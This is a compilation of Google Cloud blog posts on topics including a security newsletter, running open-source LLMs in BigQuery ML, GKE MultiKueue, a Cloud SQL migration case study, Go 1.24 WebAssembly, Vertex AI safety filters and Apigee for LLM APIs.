The paradox of more tools, but less security: Discover the key findings of Google’s global security study of more than 2,000 IT and security professionals at our March 6 webinar with Google security experts. Register here.
Please visit the Google Cloud blog for more security stories published this month.
aside_block
<ListValue: [StructValue([(‘title’, ‘Learn something new’), (‘body’, <wagtail.rich_text.RichText object at 0x3e357a3aeaf0>), (‘btn_text’, ‘Watch the video’), (‘href’, ‘https://www.youtube.com/watch?v=NtANWZPHUak’), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
Threat Intelligence news
Cybercrime, the multifaceted national security threat: In this report, Google Threat Intelligence Group (GTIG) discusses the current state of cybercrime, emphasizing why these attacks must be considered a national security threat. We also share our approach for tackling this challenge. Read more.
Adversarial misuse of generative AI: GTIG reports on how advanced persistent threat and coordinated information operations actors are attempting to misuse Gemini. Read more.
ScatterBrain and the unmasking of PoisonPlug’s obfuscator: China-nexus threat actors are evading detection and analysis by using a backdoor that employs a custom obfuscating compiler we call ScatterBrain. Read more.
Exploring third-party installer abuse in CVE-2023-6080: Building upon the insights shared in a previous Mandiant blog post, this case study explores the ongoing challenge of securing third-party Windows installers. Read more.
Using capa rules for Android malware detection: To combat new security challenges, the Android Security and Privacy Team has partnered with Mandiant FLARE to extend the open-source binary analysis tool capa to analyze native ARM ELF files targeting Android systems. Read more.
Strategic threat intelligence for financial institutions: We recently shared insights from Google Threat Intelligence at a webinar for financial institutions, including on threat actors, malicious campaigns, malware, and exploited CVEs. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Google Cloud Security and Mandiant podcasts
Everything you were afraid to ask about cloud security surprises: Or Brokman, strategic Google Cloud engineer, talks about common cloud security mistakes and why they keep happening, with hosts Anton Chuvakin and Tim Peacock. Listen here.
Navigating the new security landscape with ‘virtual’ cloud CISOs: Beth Cartier, former CISO, vCISO, and founder of Initiative Security, explores AI, cybersecurity, resilience, and whether today’s organizations are addressing all three properly, with Anton and guest host Marina Kaganovich. Listen here.
Defender’s Advantage: Agentic AI in cybersecurity: Steph Hay, senior director, Gemini Product and UX, Google Cloud Security, joins host Luke McNamara to discuss agentic AI and its implications for security disciplines. Listen here.
Behind the Binary: Shaping the world of reverse engineering: Security researcher Saumil Shah discusses the evolution of reverse engineering tools and techniques, shares insights on the importance of continuous learning, and why he started his own security conference. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in February with more security-related updates from Google Cloud.
BigQuery Machine Learning allows you to use large language models (LLMs), like Gemini, to perform tasks such as entity extraction, sentiment analysis, translation, text generation, and more on your data using familiar SQL syntax.
Today, we are extending this capability with support for any open-source LLM from the Vertex AI Model Garden — including any models you deploy from Hugging Face and including OSS models you might have tuned. This greatly expands the model choice available to developers.
In this post, we use the Meta Llama 3.3 70B model to illustrate how this integration works. However, you can use any of 170K+ text generation models available on Hugging Face by following the same steps. We’ve also got a tutorial notebook ready for you, or you can jump right into the steps below.
Using Open-Source Software (OSS) models with BigQuery ML
1. Host the model on a Vertex endpoint First, choose a text -generation model from Hugging Face. Then, navigate to Vertex AI Model Garden > Deploy from Hugging Face. Enter the model URL and optionally modify the endpoint name, deployment region, and machine spec for the deployment endpoint.
Alternatively, you can search for ‘Llama 3.3’ from the Vertex AI Model Garden UI, accept the terms, and deploy the model endpoint. You can also do this step programmatically (see the tutorial notebook here).
Note: To use LLama models, you need to agree to LLAMA 3.3 COMMUNITY LICENSE AGREEMENT on the LLama 3.3 Model Card in Hugging Face or accept terms in the Vertex Model Garden UI. You need to complete this step before deploying the model.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb818e8a550>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/bigquery/’), (‘image’, None)])]>
2. Create a remote model in BigQuery Model deployment takes several minutes. After the deployment is complete, create a remote model in BigQuery using a SQL statement like following:
code_block
<ListValue: [StructValue([(‘code’, “CREATE OR REPLACE MODEL bqml_tutorial.llama_3_3_70brnREMOTE WITH CONNECTION `LOCATION.CONNECTION_ID’rnOPTIONSrn(endpoint=’https://<region>-aiplatform.googleapis.com/v1/projects/<project_name>/locations/<region>/endpoints/<endpoint_id>’rn)”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eb818e8aa30>)])]>
To allow BigQuery to connect to a remote endpoint you need to provide a ‘Connection’. If you don’t already have a connection you can create one following the instructions here. Replace the placeholder endpoint in the above code sample with the endpoint URL. You can get information on endpoint_id from the console via Vertex AI > Online Prediction>Endpoints>Sample Request.
3. Perform inference You are now ready to perform inference against this model from BigQuery ML.For this scenario, take this medical transcripts dataset as an example. It has unstructured and varied raw transcripts capturing history, diagnosis and treatment provided of patients visiting a medical facility. A sample transcript looks like the image below:
Create a table
To analyze this data in BigQuery, first create a table.
code_block
<ListValue: [StructValue([(‘code’, “LOAD DATA OVERWRITE bqml_tutorial.medical_transcriptrnFROM FILES( format=’NEWLINE_DELIMITED_JSON’,uris = [‘gs://cloud-samples-data/vertex-ai/model-evaluation/peft_eval_sample.jsonl’] )”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eb818e8a280>)])]>
Perform inference
You can now use your Llama model to extract structured data from the unstructured transcripts in your table. Say you want to extract the patient’s age, gender and list of diseases for each entry. You can do so with a SQL statement like the following and save the derived insights to a table. Include the information you want to extract and its schema in the model prompt.
code_block
<ListValue: [StructValue([(‘code’, ‘CREATE TEMP FUNCTION ExtractOutput(s STRING)rnRETURNS STRINGrnAS (rn SUBSTR(s, INSTR(s, “Output:”)+8)rn);rnrnrnCREATE OR REPLACE TABLE bqml_tutorial.medical_transcript_analysis_results AS (rnSELECTrn ExtractOutput(ml_generate_text_llm_result) AS generated_text, * EXCEPT(ml_generate_text_llm_result)rnFROMrn ML.GENERATE_TEXT( MODEL `bqml_tutorial.llama_3_3_70b`,rn (rn SELECTrn CONCAT(‘Extract the Gender, Age (in years), and Disease information from the following medical transcript. Return **only** a JSON in the following schema: \n{ “Age”: Int, “Gender”: “String”, “Disease”: [“String”]}. If Age, Gender, or Disease information is not found, return `null` for that field. Summarize the disease(s) in 1 to 5 words. If the patient has multiple diseases, include them in a comma-separated list within the “Disease” field. Do not include any other text or labels in your response.**. \n’, input_text) AS promptrn FROMrn bqml_tutorial.medical_transcriptrn ),rn STRUCT(rn 0 AS temperature,rn 0.001 AS top_p,rn 1 AS top_k,rn 128 AS max_output_tokens,rn TRUE AS flatten_json_output))rn);rnrnrnSELECT * FROM bqml_tutorial.medical_transcript_analysis_results;’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eb818e8af70>)])]>
The output returned from this Llama endpoint includes the input prompt so we also wrote and used a ExtractOutput function to help us parse the output. The output table with the results in the ‘generated_text’ column is as follows:
Perform analytics on results
You can now perform all sorts of analytics on this data. For example, answer ‘What are the most common diseases in females with age 30+ in our sample?’ using a simple SQL query. You can see that ‘Hypertension’, ‘Arthritis’ and ‘Hyperlipidemia’ are most common.
code_block
<ListValue: [StructValue([(‘code’, “WITHrn parsed_data AS (rn SELECTrn JSON_EXTRACT_SCALAR(generated_text, ‘$.Gender’) AS gender,rn CAST(JSON_EXTRACT_SCALAR(generated_text, ‘$.Age’) AS INT64) AS age,rn JSON_EXTRACT_ARRAY(generated_text, ‘$.Disease’) AS diseases,rn FROMrn bqml_tutorial.medical_transcript_analysis_test)rnrnSELECTrn disease,rn count(*) AS occurrencernFROMrn parsed_data, UNNEST(diseases) AS diseasernWHERErn LOWER(gender) = ‘female’rn AND age >= 30rnGROUP BYrn diseasernORDER BYrn occurrence DESCrnLIMIT 3;”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eb818e8a190>)])]>
Get started today
Try out BigQuery with your own preferred open model or a tuned/distilled model with the BigQuery and Vertex Model Garden integration today. Learn more in our documentation.
The AI revolution isn’t just about large language models (LLMs) – it’s about building real-world solutions that change the way you work. Google’s global AI roadshow offers an immersive experience that’s designed to empower you, the developer, to push the boundaries of what’s possible with AI. The global roadshow is a hands-on event. Forget the abstract concepts; we’re diving into code, deployment, and complex architectures.
Across the globe, we’re hosting dynamic events to provide practical, code-level engagement with Google’s most advanced AI technologies. These events will show you how to leverage everything from Google’s cloud infrastructure to the latest Gemini 2.0 models. Whether you’re a seasoned engineer looking to optimize your system, a developer seeking to build cutting-edge applications, or a startup founder ready to innovate, this roadshow is your direct line to the future of AI development.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud developer tools’), (‘body’, <wagtail.rich_text.RichText object at 0x3ed752d4e5e0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Unlocking the power of AI: What awaits you
This global roadshow is structured to provide both foundational knowledge and specialized deep dives. We’re tailoring each event to address the specific needs and interests of our global community. Our roadshow covers the core pillars of modern AI development:
Cloud infrastructure for AI: Gain expertise in leveraging Google Cloud to build, deploy, and scale AI solutions. Learn how services like Cloud Run provide the bedrock for flexible and robust AI applications.
Advanced generative models: Master the use of powerful LLMs such as Gemini 2.0. Dive into techniques for integrating them into a variety of workflows, from real-time voice and video applications to advanced search capabilities and image or video object detection.
Responsible AI development: Learn how to utilize robust evaluation frameworks to build safe and trustworthy AI solutions. Understand how to mitigate challenges such as hallucinations, outdated information, and chaotic output formats.
Multi-agent systems: Discover the complexities of building systems with interactive AI agents. Gain practical experience in architecting dynamic and responsive AI workflows that are uniquely tailored to your specific needs.
Why this roadshow is a must-attend
You can access and grow your AI opportunities:
Deep technical content: Go beyond surface-level knowledge with in-depth sessions led by Google’s experts.
Practical hands-on experience: Gain real-world skills through interactive workshops and hands-on labs – bring your laptop and dive in!
Networking with peers: Connect and collaborate with a global community of AI innovators and experts.
Cutting-edge tech: Stay at the forefront of the AI revolution and discover the latest advancements in Google’s AI ecosystem.
Ready to transform your AI journey?
Work with the tools, gain the expertise, and join the conversation that’s shaping the future of AI. Don’t just witness the AI revolution – lead it. Find your closest event and secure your spot today!
Is your laptop starting to collect a bit of dust, slowing down, or just not acting the same as it used to? This Valentine’s day, you have an opportunity to give it the gift of a fresh start with ChromeOS Flex.
Think of ChromeOS Flex as your cupid, ready to rekindle the spark with your aging hardware. It’s Google’s no-cost, cloud-based operating system, designed to breathe new life into older PCs and Macs. Whether you’re already seeing performance decline, or you may even be ineligible for the upcoming Windows 11 upgrade, ChromeOS Flex can help modernize your device in minutes – all without breaking the bank. Sounds like true love, right?
So, what is ChromeOS Flex?
ChromeOS Flex is similar to the operating system found on Chromebooks, known for its speed, simplicity, and security. However, it’s tailored for installation on devices that weren’t designed for ChromeOS. You can take your existing Mac or PC, which may have become sluggish over time, and make it speedier, more user friendly, and more secure. In fact, there’s plenty of reasons to fall in love with ChromeOS Flex:
Speed: Remember waiting ages for your old computer to start up? ChromeOS Flex boots up in seconds, letting you get started quickly.
Security: ChromeOS Flex comes with built-in security features, protecting you from the latest malware, viruses, and other online threats.
Sustainability: Instead of throwing away your old device, you can give it a new lease on life. It’s the environmentally friendly way to show your tech some love.
Free: That’s right–ChromeOS Flex is free to install. It really is the gift that keeps on giving.
Ready to Flex? It’s just a few steps:
Check compatibility: First, make sure your device is compatible (it probably is). Google has a list of over 600 certified devices here.
Boot from the USB drive: Insert the USB drive into your laptop, power it on, and use your boot key to boot from the USB drive.
Install ChromeOS Flex: The rest is easy! Just follow the on-screen instructions to install ChromeOS Flex on your computer.
This Valentine’s day, give your old laptop a new lease on life with ChromeOS Flex. It’s the perfect way to show your tech some love, without breaking the bank or contributing to e-waste. And who knows, you might just fall in love with your old computer all over again!
Artificial Intelligence (AI) and large language models (LLMs) are experiencing explosive growth, powering applications from machine translation to artistic creation. These technologies rely on intensive computations that require specialized hardware resources, like GPUs. But access to GPUs can be challenging, both in terms of availability and cost.
For Google Cloud users, the introduction of Dynamic Workload Scheduler (DWS) transformed how you can access and use GPU resources, particularly within a Google Kubernetes Engine (GKE) cluster. Dynamic Workload Scheduler optimizes AI/ML resource access and spending by simultaneously scheduling necessary accelerators like TPUs and GPUs across various Google Cloud services, improving the performance of training and fine-tuning jobs.
But what if you want to deploy your workload in any available region, as soon as possible, as soon as DWS provides you the resources your workload needs?
This is where MultiKueue, a Kueue feature, comes into play. With MultiKueue, GKE, and Dynamic Workload Scheduler, you can wait for accelerators in multiple regions. Dynamic Workload Scheduler automatically provisions resources in the best GKE clusters as soon as they are available. By submitting workloads to a global queue, MultiKueue executes them in the region with available GPU resources, helping to optimize global resource usage, lowering costs, and speeding up processing.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee55f3b3a00>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
MultiKueue
MultiKueue enables workload distribution across multiple GKE clusters in different regions. By identifying clusters with available resources, MultiKueue simplifies the process of dispatching jobs to the optimal location.
Dynamic Workload Scheduler on GKE Autopilot, our managed Kubernetes service that automatically handles the provisioning, scaling, security, and maintenance of your container infrastructure; it’s supported on GKE Autopilot 1.30.3. Let’s take a deeper look at how to set up and manage MultiKueue with Dynamic Workload Scheduler, so you can obtain GPU resources faster.
MultiKueue cluster roles
MultiKueue provides two distinct cluster roles:
Manager cluster – Establish and maintain the connection with the worker clusters, as well as create and monitor remote objects (workloads or jobs) while keeping the local ones in sync.
Worker cluster – A simple standalone Kueue cluster that lets you execute the job submitted by the manager cluster.
Creating a MultiKueue cluster
In this example we create four GKE Autopilot clusters:
One manager cluster in europe-west4
Three worker clusters in
europe-west4
us-east4
asia-southeast1
Let’s take a look at how this works in the following step-by-step example. You can access the files for this example in this github repository.
Configures the connection between the manager cluster and the worker clusters
Configures Kueue in the worker clusters
GKE clusters, Kueue with MultiKueue, and DWS are now configured and ready to use. Once you submit your jobs, the Kueue manager distributes them across the three worker clusters.
In the dws-multi-worker.yaml file, you’ll find the Kueue configuration for the worker clusters, including the manager configuration.
The following script provides a basic example of how to set up the MultiKueue AdmissionCheck with three worker clusters.
So that’s how you can leverage MultiKueue, GKE, and DWS to streamline global job execution, optimize speed, and eliminate the need for manual node management!
This setup also addresses the needs of those with data residency requirements, allowing you to dedicate subsets of clusters for different workloads and ensure compliance.
To further enhance your setup, you can leverage advanced kueue features like team management with local kueue or workload priority classes. Additionally, you can gain valuable insights by creating a Grafana or Cloud Monitoring dashboard that utilizes Kueue metrics, which are automatically handled by Google Managed Service for Prometheus via the PodMonitoring resources.
In today’s dynamic digital landscape, building and operating secure, reliable, cost-efficient and high-performing cloud solutions is no easy feat. Enterprises grapple with the complexities of cloud adoption, and often struggle to bridge the gap between business needs, technical implementation, and operational readiness. This is where the Google Cloud Architecture Framework comes in. The framework provides comprehensive guidance to help you design, develop, deploy, and operate efficient, secure, resilient, high-performing, and cost-effective Google Cloud topologies that support your security and compliance requirements.
Who should use the Architecture Framework?
The Architecture Framework caters to a broad spectrum of cloud professionals. Cloud architects, developers, IT administrators, decision makers and other practitioners can benefit from years of subject-matter expertise and knowledge both from within Google and from the industry. The framework distills this vast expertise and presents it as an easy-to-consume set of recommendations.
The recommendations in the Architecture Framework are organized under five, business-focused pillars.
We recently revamped the guidance in all the pillars and perspectives of the Architecture Framework to center the recommendations around a core set of design principles.
In addition to the above pillars, the Architecture Framework provides cross-pillar perspectives that present recommendations for selected domains, industries, and technologies like AI and machine learning (ML).
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee55e7939d0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Benefits of adopting the Architecture Framework
The Architecture Framework is much more than a collection of design and operational recommendations. The framework empowers you with a structured principles-oriented design methodology that unlocks many advantages:
Enhanced security, privacy, and compliance: Security is paramount in the cloud. The Architecture Framework incorporates industry-leading security practices, helping ensure that your cloud architecture meets your security, privacy, and compliance requirements.
Optimized cost: The Architecture Framework lets you build and operate cost-efficient cloud solutions by promoting a cost-aware culture, focusing on resource optimization, and leveraging built-in cost-saving features in Google Cloud.
Resilience, scalability, and flexibility: As your business needs evolve, the Architecture Framework helps you design cloud deployments that can scale to accommodate changing demands, remain highly available, and be resilient to disasters and failures.
Operational excellence: The Architecture Framework promotes operationally sound architectures that are easy to operate, monitor, and maintain.
Predictable and workload-specific performance: The Architecture Framework offers guidance to help you build, deploy, and operate workloads that provide predictable performance based on your workloads’ needs.
The Architecture Framework also includes cross-pillar perspectives for selected domains, industries, and technologies like AI and machine learning (ML).
Embrace the Architecture Framework to transform your Google Cloud journey, and get comprehensive guidance on security, reliability, cost, performance, and operations — as well as targeted recommendations for specific industries and domains like AI and ML. To learn more, visit Google Cloud Architecture Framework.
When most people think of São Paulo, business and culture usually come to mind, not beef and chicken. But the state of São Paulo isn’t only home to the largest city in the hemisphere — it’s also the second largest producer of meat in a country that’s the second largest agricultural exporter in the world. Given the importance of agribusiness to Brazil’s economy, the Secretariat of Agriculture and Supply of the State of São Paulo (SAA-SP) plays a fundamental role in the development of agribusiness across the region and, by extension, the country.
With the mission of promoting the sustainable production of food, fibers and bioenergy, SAA-SP offers support to rural producers in several areas, such as technical assistance, research, agricultural defense, and access to markets. The Secretariat is also responsible for ensuring food security for the population, monitoring the quality of agricultural products and promoting nutritional education actions.
As the world’s food systems have evolved and grown more complex, organizations have looked to technology to help meet the goals for food security and sustainability. In the case of SAA-SP, the secretariat needs to securely manage increasing amounts of confidential data and ensure its critical systems are available 24/7. These systems include the Rural Environmental Registry (a mandatory electronic registry for all rural properties), and GEDAVE (a management system for animal and plant monitoring).
To give a sense of just how complex the system is, in one example, GEDAVE would handle controls for the management of poultry production, whereby each chick, after birth, needs to be transferred to a new location within 24 hours — and the entire process must be rigorously documented to ensure food safety.
If it wanted to meet the needs not only of its aging IT infrastructure but also the needs of a growing global population in need of safe, reliable food sources, the SAA-SP knew it was time to modernize some of our most important systems.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee56029aa30>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
The growing pains:
Our team in the Department of Systems Management sits within the Information Technology Coordination organization of the SAA-SP. We’re in charge of operating GEDAVE, which is a crucial system for SAA-SP that’s responsible for controlling and monitoring animal and plant health throughout the state of São Paulo.
GEDAVE records and manages data on animal movement, plant production, use of pesticides, vaccination, pest and disease control, among other information relevant to São Paulo’s agriculture. GEDAVE assists in issuing documents such as the Animal Transit Guide (GTA) and the Phytosanitary Certificate of Origin (CFO), which are essential for the trade of agricultural products.
GEDAVE’s back-end was developed in Java and connected to a SQL Server database. It contains sensitive information about rural producers, such as production data, management strategies, and financial information. Previously, this database was hosted on-premises, which caused a series of issues, including:
Difficulty in keeping the database up to date: Applying patches and security updates in the on-premises environment required time and planning, resulting in periods of system unavailability, directly impacting producers who depend on SAA-SP services.
Complexity in performing regular backups: Ensuring data security with regular and reliable backups was a complex and laborious process in the on-premises environment.
Challenging high availability: Maintaining high availability of the on-premises database required investments in redundant and complex infrastructure, increasing management costs and complexity.
In addition, SAA-SP needed to ensure the 24/7 availability of these systems to help producers meet market demands, including such complex issues as quality control for export and monitoring internal production.
Data security was also crucial, as information on types of herds, vaccination strategies, pest control, among others, is highly sensitive and requires rigorous protection.
Sowing the seeds of innovation:
SAA-SP decided to modernize its data infrastructure to address these challenges, choosing Google Cloud. They felt the Google Cloud platform’s high performance could ensure application availability and efficiency, while its ease of management would simplify database administration and allows the IT team to focus on other priorities.
As a first step in this modernization, SAA-SP migrated its SQL Server database to Cloud SQL for SQL Server on Google Cloud. A crucial factor in the choice was the ease of enabling high availability (HA) in Cloud SQL for SQL Server. With just a few clicks, SAA-SP configured automatic database replication and failover, ensuring service continuity in the event of failures and compliance with SLAs, without the need for complex configurations. In addition, the migration to Cloud SQL for SQL Server was carried out quickly and easily, minimizing the impact on SAA-SP’s operations.
This strategic change brought a series of benefits, allowing Java applications to connect to a more modern, scalable and secure database environment.
Harvesting success:
Simplified updates: Cloud SQL for SQL Server makes it easier to apply patches and updates, minimizing downtime and ensuring that systems are always protected with the latest versions of the software.
Automated backups: The service offers automated and managed backups, ensuring data security and recovery in the event of failures.
Simplified high availability: The simplified configuration of high availability in Cloud SQL for SQL Server reduced the effort of the IT team and ensured compliance with service SLAs.
Enhanced security: With data encryption at rest and in transit, Cloud SQL for SQL Server protects SAA-SP’s confidential information from unauthorized access.
On-demand scalability: SAA-SP can adjust Cloud SQL for SQL Server resources according to demand, ensuring optimal performance of Java applications, even during peak periods.
Focus on innovation: SAA-SP’s IT team can now focus on strategic projects, such as developing new features for Java applications, instead of worrying about managing the data infrastructure.
Reduced IT costs: The migration to Cloud SQL for SQL Server eliminated the need to invest in hardware and software to maintain the on-premises database, reducing operational costs.
Cultivating a future of innovation in agriculture with Cloud SQL for SQL Server:
The migration to Cloud SQL for SQL Server was a strategic decision that allowed SAA-SP to overcome the challenges of on-premises data management and ensure the availability, security, and scalability of its critical systems. The ease of enabling high availability and the simplicity of the migration were determining factors for the success of the project.
But more than that, Cloud SQL enabled innovation at SAA-SP, opening doors to integration with generative AI for more assertive and efficient analysis and decision-making. For example, SAA-SP is leveraging the power of Gemini with Looker to provide C-level executives with real-time data insights hosted on Cloud SQL, facilitating data-driven decisions.
Furthermore, SAA-SP is empowering its customers with Gemini Database, allowing them to harness AI to enhance database performance and maintenance.
SAA-SP plans to continue modernizing its infrastructure and services, undertaking:
Migration to microservices: Launch an updated version of the microservices-based application to increase the flexibility, scalability and capacity of the system.
Data analysis with generative AI: Enable the use of generative AI to perform predictive analysis and obtain real-time insights from Cloud SQL for SQL Server data, assisting in strategic decision-making for the agricultural sector.
Data management with Gemini: Use Gemini to facilitate data management and analysis, extracting relevant information and simplifying access to complex data.
SAA-SP’s move towards intelligent management of operations, coupled with the advancements in analysis, has consolidated SAA-SP’s position as a reference in technology and innovation in the agricultural sector, driving the development of agribusiness across São Paulo and serving as a beacon for those around the world.
Get Started:
Discover how Cloud SQL for SQL Server can enhance your application performance and ensure uninterrupted availability.
Read more on how others like Ford and Visual Research are modernizing their workloads with Cloud SQL for SQL Server, resulting in high performance and cost reduction.
Earlier this week, we released Go 1.24, the latest version of Google’s open-source programming language for productively building scalable, production-ready backend and cloud-based systems.
There’s a lot to love about Go 1.24, including support for post-quantum cryptography, a weak pointer implementation, and substantial performance improvements to the Go runtime. Go 1.24 also significantly expands its capabilities for WebAssembly (Wasm), a binary instruction format that provides for the execution of high-performance, low-level code at speeds approaching native performance. With a new `go:wasmexport` compiler directive and the ability to build a reactor for the WebAssembly System Interface (WASI), developers can now export functions from their Go code to Wasm — including in long-running applications — fostering deeper integrations with Wasm hosts and unlocking new possibilities for Go-based Wasm applications.
These additions represent a significant step forward in Go’s Wasm story. For some types of applications, like those running at the edge, Wasm is critical to serving performance-critical use cases. Now, developers can leverage Go’s signature capabilities to ensure that these use cases are also scalable, secure, and production-ready.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb7c2e44790>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
How does it work?
Go first added support for compiling to Wasm in Go 1.11 via the `js/wasm` port, and added a new port for the WASI preview 1 syscall API in Go 1.21. Now, with Go 1.24, the new `go:wasmexport` compiler directive makes Go functions accessible to a Wasm host, enabling the host to call into a Go application like a plugin or other extension mechanism. And, with the new WASI reactor build flag, a Go application remains live after its initialization function finishes, helping to ensure that exported functions remain callable without requiring reinitialization — an important feature in long-running applications or services.
For more details, be sure to check out this post from the Go blog and read more in the Go docs.
Run Wasm at the edge with Google Cloud
Starting today, you can now run Go compiled Wasm plugins for applications built on Google Cloud at the edge. To do so, you need to leverage Service Extensions with Google Cloud’s Application Load Balancers. Service Extensions allows you to run your own custom code directly in the request/response path in a fully managed Google environment with optimal latency, so you can customize load balancers to meet your business requirements. All you need to do is provide the code — Google Cloud manages the rest.
To get started with Service Extensions plugins and Go, take a look at our growing samples repository with a local testing toolkit and follow our quickstart guide in the documentation.
As organizations rush to adopt generative AI-driven chatbots and agents, it’s important to reduce the risk of exposure to threat actors who force AI models to create harmful content.
We want to highlight two powerful capabilities of Vertex AI that can help manage this risk — content filters and system instructions. Today, we’ll show how you can use them to ensure consistent and trustworthy interactions.
Content filters: Post-response defenses
By analyzing generated text and blocking responses that trigger specific criteria, content filters can help block the output of harmful content. They function independently from Gemini models as part of a layered defense against threat actors who attempt to jailbreak the model.
Gemini models on Vertex AI use two types of content filters:
Non-configurable safety filters automatically block outputs containing prohibited content, such as child sexual abuse material (CSAM) and personally identifiable information (PII).
Configurable content filters allow you to define blocking thresholds in four harm categories (hate speech, harassment, sexually explicit, and dangerous content,) based on probability and severity scores. These filters are default off but you can configure them according to your needs.
It’s important to note that, like any automated system, these filters can occasionally produce false positives, incorrectly flagging benign content. This can negatively impact user experience, particularly in conversational settings. System instructions (below) can help mitigate some of these limitations.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e71d60e52b0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
System instructions: Proactive model steering for custom safety
System instructions for Gemini models in Vertex AI provide direct guidance to the model on how to behave and what type of content to generate. By providing specific instructions, you can proactively steer the model away from generating undesirable content to meet your organization’s unique needs.
You can craft system instructions to define content safety guidelines, such as prohibited and sensitive topics, and disclaimer language, as well as brand safety guidelines to ensure the model’s outputs align with your brand’s voice, tone, values, and target audience.
System instructions have the following advantages over content filters:
You can define specific harms and topics you want to avoid, so you’re not restricted to a small set of categories.
You can be prescriptive and detailed. For example, instead of just saying “avoid nudity,” you can define what you mean by nudity in your cultural context and outline allowed exceptions.
You can iterate instructions to meet your needs. For example, if you notice that the instruction “avoid dangerous content” leads to the model being excessively cautious or avoiding a wider range of topics than intended, you can make the instruction more specific, such as “don’t generate violent content” or “avoid discussion of illegal drug use.”
However, system instructions have the following limitations:
They are theoretically more susceptible to zero-shot and other complex jailbreak techniques.
They can cause the model to be overly cautious on borderline topics.
In some situations, a complex system instruction for safety may inadvertently impact overall output quality.
We recommend using both content filters and system instructions.
Evaluate your safety configuration
You can create your own evaluation sets, and test model performance with your specific configurations ahead of time. We recommend creating separate harmful and benign sets, so you can measure how effective your configuration is at catching harmful content and how often it incorrectly blocks benign content.
Investing in an evaluation set can help reduce the time it takes to test the model when implementing changes in the future.
How to get started
Both content filters and system instructions play a role in ensuring safe and responsible use of Gemini. The best approach depends on your specific requirements and risk tolerance. To get started, check out content filters and system instructions for safety documentation.
Generative AI is now well beyond the hype and into the realm of practical application. But while organizations are eager to build enterprise-ready gen AI solutions on top of large language models (LLMs), they face challenges in managing, securing, and scaling these deployments, especially when it comes to APIs. As part of the platform team, you may already be building a unified gen AI platform. Some common questions you might have are:
How do you ensure security and safety for your organization? As with any API, LLM APIs represent an attack vector. What are the LLM-specific considerations you need to worry about?
How do you stay within budget when your LLM adoption grows, while ensuring that each team has appropriate LLM capacity they need to continue to innovate and make your business more productive?
How do you put the right observability capabilities in place to understand your usage patterns, help troubleshoot issues, and capture compliance data?
How do you give end users of your gen AI applications the best possible experience, i.e., provide responses from the most appropriate models with minimal downtime?
Apigee, Google Cloud’s API management platform, has enabled our customers to address API challenges like these for over a decade. Here is an overview of the AI-powered digital value chain leveraging Apigee API Management.
Figure 1: AI-powered Digital Value chain
Gen AI, powered by AI agents and LLMs, is changing how customers interact with businesses, creating a large opportunity for any business. Apigee streamlines the integration of gen AI agents into applications by bolstering their security, scalability, and governance through features like authentication, traffic control, analytics, and policy enforcement. It also manages interactions with LLMs, improving security and efficiency. Additionally, Application Integration, an Integration-Platform-as-a-Service solution from Google cloud, offers pre-built connectors that allow gen AI agents to easily connect with databases and external systems, helping them fulfill user requests.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e0ad423a3d0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
This blog details how Apigee’s customers have been using the product to address challenges specific to LLM APIs. We’re also releasing a comprehensive set of reference solutions that enable you to get started on addressing these challenges yourself with Apigee. You can also view a webinar on the same topic, complete with product demos.
Apigee as a proxy for agents
AI agents leverage capabilities from LLMs to accomplish tasks for end-users. These agents can be built using a variety of tools — from no-code and low-code platforms, to full-code frameworks like LangChain or LlamaIndex. Apigee acts as an intermediary between your AI application and its agents. It enhances security by allowing you to defend your LLM APIs against theOWASP Top 10 API Security risks, manages user authentication and authorization, and optimizes performance through features like semantic caching. Additionally, Apigee enforces token limits to control costs and can even orchestrate complex interactions between multiple AI agents for advanced use cases.
Apigee as a gateway between LLM application and models
